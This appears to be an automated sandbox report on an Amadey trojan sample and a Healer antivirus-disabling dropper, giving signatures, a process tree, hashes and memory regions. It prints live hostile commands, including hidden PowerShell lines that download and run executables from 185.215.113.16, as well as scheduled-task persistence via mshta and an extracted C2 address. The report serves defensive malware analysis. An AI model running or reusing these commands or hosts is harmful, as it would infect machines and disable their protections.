Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-02-2025 17:25

General

  • Target

    50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced.exe

  • Size

    2.0MB

  • MD5

    aa883f75bff0257a0fefd5d8d20c6297

  • SHA1

    3fb6e0f9349bab21030e8f7168cf74ea89567c97

  • SHA256

    50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced

  • SHA512

    651922f8a37211c043287b37d7f2e7a06fa795550503687ddcd93d17d96d504ac420fd642f659b722feb3dbbf173042480a470382cece8717f53e696af5d57b7

  • SSDEEP

    49152:yzrn/QLcFz1XcsHUO6nWM2UDhIImtMkKuK6nSsLThklxLEOGMJ7F/gcI1:A4LcFz1XcsHUOaWDUDhnmtMkv1SDBl5b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 5 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3408
      • C:\Users\Admin\AppData\Local\Temp\50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced.exe
        "C:\Users\Admin\AppData\Local\Temp\50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3912
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3348
          • C:\Users\Admin\AppData\Local\Temp\1075489001\a7366cb9c8.exe
            "C:\Users\Admin\AppData\Local\Temp\1075489001\a7366cb9c8.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn JzmMmmaXrCR /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxddZpdyU.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3260
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn JzmMmmaXrCR /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxddZpdyU.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:972
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\kxddZpdyU.hta
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3812
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A6K17LFUCMPHD3IW7OSX4ETLIT3AEIXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3992
                • C:\Users\Admin\AppData\Local\TempA6K17LFUCMPHD3IW7OSX4ETLIT3AEIXS.EXE
                  "C:\Users\Admin\AppData\Local\TempA6K17LFUCMPHD3IW7OSX4ETLIT3AEIXS.EXE"
                  7⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3996
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3040
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd" any_word
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1408
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                6⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3728
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3604
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:776
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3904
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4136
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3376
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "Tiko4maK8BP" /tr "mshta \"C:\Temp\dlvzfjGos.hta\"" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:4048
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\dlvzfjGos.hta"
                6⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3580
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1828
          • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
            "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4668
      • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe
        "C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:1712
    • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkUxMkFDNEEtOEI3Qi00RTk0LTlERkYtNkJBQ0FDQTQ1MDk1fSIgdXNlcmlkPSJ7MzExNTAxMjctQUM0OS00MEM0LUIwOTQtMjIxOTVBQUY2N0JFfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NkRDQzUxRDMtMzgxRi00RDgxLTg1QTUtNTUyOTgyNTI1Q0MwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY0MzMiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODc1OTU2NTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0ODAxMzEyODcyIi8-PC9hcHA-PC9yZXF1ZXN0Pg
      1⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:2572
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:972
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:1696
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:3904

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\dlvzfjGos.hta

      Filesize

      782B

      MD5

      16d76e35baeb05bc069a12dce9da83f9

      SHA1

      f419fd74265369666595c7ce7823ef75b40b2768

      SHA256

      456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

      SHA512

      4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      5633b1f21d998905bc3cd23337df0cb6

      SHA1

      aa1bde9abf9b1b7e596aa199525aca6cf0e496da

      SHA256

      4445cecdd985c7d8450d8701c377c6d556b1b865ab7b92c7bd6605ffec53f6b0

      SHA512

      55750329af40bea580b1f5b1276ebd2cb6a48a7cf29889c3b9a5463562706cef34c40817ad0898c2bcb9ece73d8cfd275985acea34f5dde74cb4bd1ffa65152f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      281f8774b53681ae630701c51e671a44

      SHA1

      d7a68d387b85d16f25dcdef35bd43dbc55ab8723

      SHA256

      9b5af1fa409b783e650932ebffe4272bc04cdf4b6aecfb92ea16c832af325897

      SHA512

      c0fdb3b175dabc40d60c15bf0bd29941e820d5ae3050478d40f2d31eb2d7060dedc098c522de8d2e744300b87830bcd6c5860363c65e9b04f2456b8c37058cbb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      17KB

      MD5

      048d2a2ddb599f77bdc6580f0ac65644

      SHA1

      10b38e4ac250b80b39950a475850a5c72f5df25c

      SHA256

      cb3b2bcf7db1c02920cb304edde3c45dcba16eaf4b59d4b1a8d0c1550373b75c

      SHA512

      aa7a8d686f0ce46272861aaf5127bbe0bc46a7e346f5a441fae4a8bce3893b495647e5712b0d3f95002c438ae7241216e6f4291d2578cfa0bebd77ea12286ddd

    • C:\Users\Admin\AppData\Local\TempA6K17LFUCMPHD3IW7OSX4ETLIT3AEIXS.EXE

      Filesize

      1.7MB

      MD5

      eb08d89d3f955a53b94a98163d6b767d

      SHA1

      b9b08510af7e5e92a7fe2c96b7baa60c58f7d1d9

      SHA256

      314a1bfda1983b7d65b3dfaf5e2a954f0c7582ed6794515d1297b1db73bb3c31

      SHA512

      820f69a1644dfb02d48523388ba6ca0e4013b73c39d5b0d16d460352b3586b7d006bb38be9d8b1a5e95f19714f919691939dfaae74148199d61214ee70bcc664

    • C:\Users\Admin\AppData\Local\Temp\1075350001\k6Sly2p.exe

      Filesize

      2.2MB

      MD5

      a50b9683334a92aa74d0992311a32026

      SHA1

      559b36d8ff81c26d299fe903e295b8d6151220c2

      SHA256

      e49b4b0df17f0e328b944dec251fabdc3fb84112a6f9b6d84dbecf4313846d23

      SHA512

      66fcfcd7fb1a8aadfd806acfa54bba8bff570ca72bc3a81232399f0d7b58eff9efa8c0ad5488ded372a1c6ab75dc4dbd2a98241ba403fb86a21970aa2535785b

    • C:\Users\Admin\AppData\Local\Temp\1075489001\a7366cb9c8.exe

      Filesize

      938KB

      MD5

      b22ba25c5a115656da9e224a62752782

      SHA1

      a26d2e82e8812558e15ea6a8f245dcf23d1a450b

      SHA256

      e60af2cd6c1c46de7f3b5d8ab8a2e43198929f86b9443a66388fbce9ed48ca53

      SHA512

      f77aa45dd57d9016828482a41bda218a90ad7c60712fa9154d928c6630ae923c24114f48fd2992b376abcb86243d7dbe5190753b9d0c6bbe769b9501e867d66f

    • C:\Users\Admin\AppData\Local\Temp\1075490021\am_no.cmd

      Filesize

      2KB

      MD5

      189e4eefd73896e80f64b8ef8f73fef0

      SHA1

      efab18a8e2a33593049775958b05b95b0bb7d8e4

      SHA256

      598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

      SHA512

      be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

    • C:\Users\Admin\AppData\Local\Temp\1075515001\k6Sly2p.exe

      Filesize

      2.3MB

      MD5

      532ae0cc2387d47de8c285b3cfd4dafc

      SHA1

      2f6654c4fe01b3bb8b4b7829ade6cb6bc528be23

      SHA256

      35209605e2bcb1c50dc79aed7428240050c191eb26b704ba373a9e15d75e853e

      SHA512

      824301eb4250ffe96fa06a401b09f9dd01206b82ef7bd0ab6b814f35b599025aadd4f9803424343409e12e6b0d6ae1e27caf4290c55164777558780781d1251e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jsvwmn1r.5fh.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

      Filesize

      2.0MB

      MD5

      aa883f75bff0257a0fefd5d8d20c6297

      SHA1

      3fb6e0f9349bab21030e8f7168cf74ea89567c97

      SHA256

      50df2efc36116c3304f57dbc7d5f6ef6adef582e53f0662b2dac87f8757f1ced

      SHA512

      651922f8a37211c043287b37d7f2e7a06fa795550503687ddcd93d17d96d504ac420fd642f659b722feb3dbbf173042480a470382cece8717f53e696af5d57b7

    • C:\Users\Admin\AppData\Local\Temp\kxddZpdyU.hta

      Filesize

      726B

      MD5

      0b120f7ea014c0ba7992d6487b34506a

      SHA1

      9d80bfdab930323e54cf918bc115a6151a705871

      SHA256

      521f501e46efc2ccb626f3f663026edfbf286b2651bc65c41b07da009f020df4

      SHA512

      4f8fd3dc568e5cf09189a47ed2316ddcbe26495a469319f53118b10ee73fdf4733382ea37d25f706473872fc66994a291285aa75ba85c90c2a70236a5c7c4c00

    • memory/972-29-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/972-27-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/1696-41-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/1696-42-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/1828-177-0x0000000005D70000-0x0000000005DBC000-memory.dmp

      Filesize

      304KB

    • memory/1828-166-0x0000000005530000-0x0000000005884000-memory.dmp

      Filesize

      3.3MB

    • memory/3348-22-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-43-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-35-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-36-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-37-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-38-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-39-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-34-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-32-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-19-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-44-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-31-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-59-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-30-0x0000000000D11000-0x0000000000D79000-memory.dmp

      Filesize

      416KB

    • memory/3348-25-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-33-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-108-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-23-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-21-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3348-20-0x0000000000D11000-0x0000000000D79000-memory.dmp

      Filesize

      416KB

    • memory/3904-1537-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3904-1535-0x0000000000D10000-0x00000000011B0000-memory.dmp

      Filesize

      4.6MB

    • memory/3912-18-0x0000000000A80000-0x0000000000F20000-memory.dmp

      Filesize

      4.6MB

    • memory/3912-17-0x0000000000A81000-0x0000000000AE9000-memory.dmp

      Filesize

      416KB

    • memory/3912-5-0x0000000000A80000-0x0000000000F20000-memory.dmp

      Filesize

      4.6MB

    • memory/3912-2-0x0000000000A81000-0x0000000000AE9000-memory.dmp

      Filesize

      416KB

    • memory/3912-0-0x0000000000A80000-0x0000000000F20000-memory.dmp

      Filesize

      4.6MB

    • memory/3912-3-0x0000000000A80000-0x0000000000F20000-memory.dmp

      Filesize

      4.6MB

    • memory/3912-1-0x0000000077B74000-0x0000000077B76000-memory.dmp

      Filesize

      8KB

    • memory/3992-147-0x0000000007680000-0x00000000076A2000-memory.dmp

      Filesize

      136KB

    • memory/3992-94-0x0000000005DB0000-0x0000000006104000-memory.dmp

      Filesize

      3.3MB

    • memory/3992-109-0x0000000007B80000-0x00000000081FA000-memory.dmp

      Filesize

      6.5MB

    • memory/3992-146-0x0000000007720000-0x00000000077B6000-memory.dmp

      Filesize

      600KB

    • memory/3992-148-0x00000000087B0000-0x0000000008D54000-memory.dmp

      Filesize

      5.6MB

    • memory/3992-96-0x00000000062A0000-0x00000000062EC000-memory.dmp

      Filesize

      304KB

    • memory/3992-81-0x00000000053D0000-0x00000000059F8000-memory.dmp

      Filesize

      6.2MB

    • memory/3992-95-0x0000000006260000-0x000000000627E000-memory.dmp

      Filesize

      120KB

    • memory/3992-82-0x0000000005A00000-0x0000000005A22000-memory.dmp

      Filesize

      136KB

    • memory/3992-110-0x0000000006780000-0x000000000679A000-memory.dmp

      Filesize

      104KB

    • memory/3992-80-0x0000000002CB0000-0x0000000002CE6000-memory.dmp

      Filesize

      216KB

    • memory/3992-84-0x0000000005C40000-0x0000000005CA6000-memory.dmp

      Filesize

      408KB

    • memory/3992-83-0x0000000005B60000-0x0000000005BC6000-memory.dmp

      Filesize

      408KB

    • memory/3996-165-0x00000000002B0000-0x0000000000716000-memory.dmp

      Filesize

      4.4MB

    • memory/3996-164-0x00000000002B0000-0x0000000000716000-memory.dmp

      Filesize

      4.4MB

    • memory/3996-159-0x00000000002B0000-0x0000000000716000-memory.dmp

      Filesize

      4.4MB

    • memory/3996-1531-0x00000000002B0000-0x0000000000716000-memory.dmp

      Filesize

      4.4MB

    • memory/3996-1528-0x00000000002B0000-0x0000000000716000-memory.dmp

      Filesize

      4.4MB

    • memory/4668-234-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-206-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-240-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-244-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-242-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-238-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-236-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-202-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-232-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-230-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-228-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-226-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

    • memory/4668-224-0x00000000053A0000-0x0000000005499000-memory.dmp

      Filesize

      996KB

